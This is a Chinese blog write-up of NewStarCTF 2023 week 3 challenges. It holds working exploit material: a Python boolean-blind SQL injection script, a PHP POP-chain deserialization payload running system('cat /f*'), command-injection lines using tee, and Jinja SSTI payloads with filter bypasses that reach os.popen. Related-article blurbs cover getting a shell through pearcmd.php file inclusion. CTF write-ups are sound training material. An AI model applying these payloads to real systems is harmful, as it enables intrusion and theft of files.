newstarctf 2023 week3

最新推荐文章于 2024-05-30 11:21:03 发布
最新推荐文章于 2024-05-30 11:21:03 发布
阅读量113 收藏
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lgsyydsa/article/details/134147717
版权

NewStarCTF 2023 Week3 官方WriteUp (shimo.im)

web

Include 🍐

pearcmd文件包含

medium_sql

http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/?id=TMP0919' %23
回显正常
fuzz一下
order union 被ban  不过很多的大小写没被ban
if没被ban
试试布尔
http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/?id=TMP0919' And if(1>0,1,0)%23  回显正常
http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/?id=TMP0919' And if(1<0,1,0)%23 无回显
说明布尔盲注可行
^异或
ascii

poc

import requests
import time
i =0
url = "http://898818ae-370d-46ad-9fdc-8a99df3e81ba.node4.buuoj.cn:81/"
result = ""
# for k in range (0,10):
for j in range (1,10000):
    l = 32
    r = 128
    mid = (l+r)>>1
    while (l <r ):
        # 爆表名
        # payload ="?id=TMP0919\' And AScii(SUbstr(database(),{0},1))>{1}%23".format(j,mid)
        # 爆库名
        # payload =  "?id=TMP0919' And ASCii(SUbstr((SElect GRoup_COncat(TAble_NAme) FRom INFORmation_Schema.Tables WHere Table_Schema='ctf'),{0},1))>{1}%23".format(j,mid)
        # 爆字段
        # payload = "?id=TMP0919' And ASCii(SUbstr((SElect GRoup_COncat(COLUmn_NAme) FRom INFORmation_Schema.COLUmns WHere TAble_NAme='here_is_flag'),{0},1))>{1}%23".format(j, mid)
        # payload = "?id=TMP0919' And AScii(SUbstr((SElect flag FRom here_is_flag),{0},1))>{1}%23".format(j,mid)
        response = requests.get(url+payload)
        time.sleep(0.2)
        if "points" in response.text:
            l = mid + 1
        # print(payload)
            #print(response.text)
        else :
            r = mid
        mid = (l +r )>>1
    if (chr(mid) == " "):
        break
    result = result + chr(mid)
    i+=1
    print(i)
    print(result)
print(result)

POP Gadget

Begin::__destruct->Then::__toString->Super::__invoke->Handle::__call->Ctf::end->whitegod::__unset

<?php
class Begin{
    public $name;

    public function __construct()
    {
        $this->name=new Then;
    }
}

class Then{
    private $func;

    public function __construct()
    {
        $this->func=new Super;
        
    }

}

class Handle{
    protected $obj;

    public function __construct()
    {
        $this->obj=new CTF;
    }

}

class Super{
    protected $obj;
    public function __construct()
    {
        $this->obj=new Handle;
    }

    public function end()
    {
        die("==GAME OVER==");
    }
}

class CTF{
    public $handle;

    public function __construct()
    {
$this->handle=new WhiteGod;
    }

}

class WhiteGod{
    public $func;
    public $var;

    public function __construct()
    {
        $this->func='system'; 
        $this->var='cat /f*';  //readfile(/flag)也行
    }
}

echo urlencode(serialize(new Begin));
?>

不知道为什么ls / 没反应

R!!!C!!!E!!!

echo拿来调用__toString方法

由于没有输出,exec执行完命令后没有结果输出,尝试tee命令

ls / | te\e 1

cat /flag_is_h3eeere | te\e 2

GenShin

给name传参?secr3tofpop?name={{4*4}}

被过滤了

传参?secr3tofpop?name={%print(4*4)%}

?name={%print(''__class__)%}

继续被ban,这个被ban的话,就用get_flashed_messages或者url_for(虽然我也不知道这是啥)

?name={%print(get_flashed_messages.__globals__.os['popen']("cat /flag").read() )%}

url_for被ban了
?name={%print(get_flashed_messages.__globals__.os['popen']("cat /flag").read())%} 被过滤
可能是popen被检测到了,试试拼接绕过
?name={%print(get_flashed_messages.__globals__.os['pop'+'en']("cat /flag").read())%}
还是被过滤了,后来才发现是单引号被检测了
?name={%print(get_flashed_messages.__globals__.os["pop"+"en"]("cat /flag").read())%}
flag{0e66f27c-7114-4db2-b82f-817c22b2aeec}

misc

阳光开朗大男孩

secret内容:

法治自由公正爱国公正敬业法治和谐平等友善敬业法治富强公正民主法治和谐法治和谐法治法治公正友善敬业法治文明公正自由平等诚信平等公正敬业法治和谐平等友善敬业法治和谐和谐富强和谐富强和谐富强平等友善敬业公正爱国和谐自由法治文明公正自由平等友善敬业法治富强和谐自由法治和谐法治和谐法治和谐法治法治和谐富强法治文明公正自由公正自由公正自由公正自由

decode:this_password_is_s000_h4rd_p4sssw0rdddd

flag内容:

🙃💵🌿🎤🚪🌏🐎🥋🚫😆😍🌊⏩🔬🚹✉☀☺🚹🐅🎤🛩💵🌿🌊🚰😊🌊✉🐎❓🎈🌉👑🎅📮🥋👣🕹🚪☀🔄🚫🐍❓🐍😊☀🔬🍍🤣🎈🥋🙃👑🌏🐎🌊📮😂💵🏹👉❓😇🍴💧☺💵😁☃👉🎅👁☂🌿👉🍴🌪👌🍴🍵🖐😇🍍😀🗒🗒

网上搜emoij解码emoji-aes

key就是secret解码的内容

没想到key居然是s000_h4rd_p4sssw0rdddd,难怪一直解码不出来

flag{3m0ji_1s_s0000_1nt3rest1ng_0861aada1050}

大怨种

将gif分离后得到一个二维码,上网搜才知道是汉信码

主要是QR还扫不出来

在线汉信码识别,汉信码解码 - 兔子二维码

这个网站就能扫出来

flag{1_d0nt_k0nw_h0w_to_sc4n_th1s_c0d3_acef808a868e}

一个俗人纳
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
week3.zip
03-29
week3.zip
利用pearcmd.php从LFI到getshell
feng的博客
10-29 5057
前言 也是从来没有学习过这种LFI的思路。今天晚上再复现前几天的强网杯拟态的时候遇到了这个pearcms.php的文件包含,进行了一波学习。 环境 安装了pear(这样才能有pearcmd.php) 开启了register_argc_argv 存在文件包含且可以包含后缀为php的文件且没有open_basedir的限制。 先说说这个pear。我就说觉得这东西为什么很眼熟,原来昨天看php底层C的目录结构的时候刚看到过。这个东西的全称叫PHP Extension and Application Repos
pearcmd文件包含漏洞
Elite的博客
01-20 1408
pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库
pearcmd.php的文件包含利用 和SSI注入漏洞
十一.的博客
10-01 437
CTF newstar新生赛 心得
利用pearcmd.php文件包含拿shell(LFI)
m0_62422842的博客
09-08 2441
最近看博客的时候遇到有师傅总结了一个新颖的文件包含思路,通过pearcmd.php来进行本地文件包含来拿shell,我感觉还挺有意思的,就花时间来学习了一下。
pearcmd.php文件包含妙用
leekos的博客,分享web安全相关知识~
07-24 1231
是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.4及以后,需要我们在编译PHP的时候指定。这样我们就可以从远程服务器上下载shell到靶机上了,使用文件包含注意将路径url编码。不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在。必须传入两个参数,第一个参数传入绝对路径,第二个参数传入想要保存的文件名。运行,如果存在文件包含漏洞,就可以运行这个命令行工具。此处我们传入的第一个参数不是一个绝对路径,所以不行。这样,在文件包含下,我们就可以运行。
浅谈文件包含之包含pearcmd.php漏洞
JCPS_Y的博客
10-26 3440
浅谈一下文件包含之包含pearcmd.php漏洞
CTF中的pearcmd.php文件包含
qq_52988816的博客
09-27 955
还是太菜了,当初看羊城杯的这个题目时完全没有想到可以用这个方法来做,还是做题太少了啊。
pearcmd.php文件包含,相关CTF例题
m0_63716101的博客
11-27 1070
pear的默认安装路径为/usr/local/lib/php/pear.php,在命令行中可以使用pear和/usr/local/lib/php/pear.php运行,如果存在文件包含漏洞,则可以直接运行此命令,下面我们介绍一下register_argc_argv选项,如果此选项打开,则此时用户输入的内容。file后面是pearcmd的默认路径,因为Index.php提示了后面会加php,所以直接/usr/local/lib/php/pearcmd就好了。但他最后会在file后面加个.php,题目提示了。
利用pearcmd.php本地文件包含(LFI)
Mrs_H的博客
01-08 5688
利用pearcmd.php本地文件包含(LFI) 一.前言 pearcmd这个东西很久以前就已经复现过了,但是当时没有记录下来。这些天在整理之前比赛的wp的时候突然看见了pear的LFI到getshell,就突然想起来自己应该是利用过了的。但是怎么找也找不到之前的笔记,于是就有了再复现一遍的想法。 二.正文 1.环境的准备 这里的话我使用的是docker来搭建的一个lamp,然后在这个lamp上面进行后续的漏洞复现。至于为什么这么做呢?照P神的话来说就是因为在Docker任意版本的镜像中pear都会被默认安
week3.mlx
03-25
week3.mlx
week3 homework.pptx
03-05
week3 homework.pptx
Week3Problem1
03-22
Week3Problem1
Week3.cpp
10-26
Week3.cpp
【漏洞复现】多语言文件包含漏洞分析
kali_Ma的博客
12-29 1734
ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,实现目录穿越+文件包含,通过pearcmd文件包含这个trick即可实现RCE。直接利用p牛文章中的请求包,需要根据实际情况改变文件名称,写不进去可以考虑多加点…这次我们直接写到网站根目录(注:phpinfo可以查看网站绝对路径)2、官方已发布6.0.14、5.1.42,建议升级至安全版本。1、若无必要,可关闭多语言功能,可参考文档。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。
初始认识pearcmd.php
m0_62706061的博客
11-17 573
初始pearcmd.php
php 利用pearcmd实现裸文件包含
weixin_45805993的博客
12-03 1860
主要内容参考P神博客https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html 0x00phpinfo与条件竞争 之前做题好像遇到过,再复习一下 我们对任意一个PHP文件发送一个上传的数据包时,不管这个PHP服务后端是否有处理$_FILES的逻辑,PHP都会将用户上传的数据先保存到一个临时文件中,这个文件一般位于系统临时目录,文件名是php开头,后面跟6个随机字符;在整个PHP文件执行完毕后,这些上传的临时文件就会被清理掉
【redis】Spring之RedisTemplate配置与使用
最新发布
05-30 330
转载:Spring之RedisTemplate配置与使用用过redis,但直接使用Jedis进行相应的交互操作,现在正好来看一下RedisTemplate是怎么实现的,以及使用起来是否更加便利。
如何mysql数据导入到mongdb
codemami的博客
05-30 1183
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
WEEK3|CRYPTO
10-20
WEEK3|CRYPTO是指加州大学伯克利分校开设的一门加密学课程,旨在介绍加密学的基本概念和技术,包括对称加密、公钥加密、哈希函数、数字签名等内容。该课程由加密学专家David Wagner教授主讲,通过在线视频、课程笔记和编程作业等形式进行教学。 在该课程中,学生将学习到加密学的基本原理和应用,包括如何使用加密技术保护数据的机密性、完整性和可用性,以及如何设计和分析安全的加密算法和协议。此外,该课程还将介绍一些实际应用,如SSL/TLS协议、PGP加密、数字货币等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一个俗人纳

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值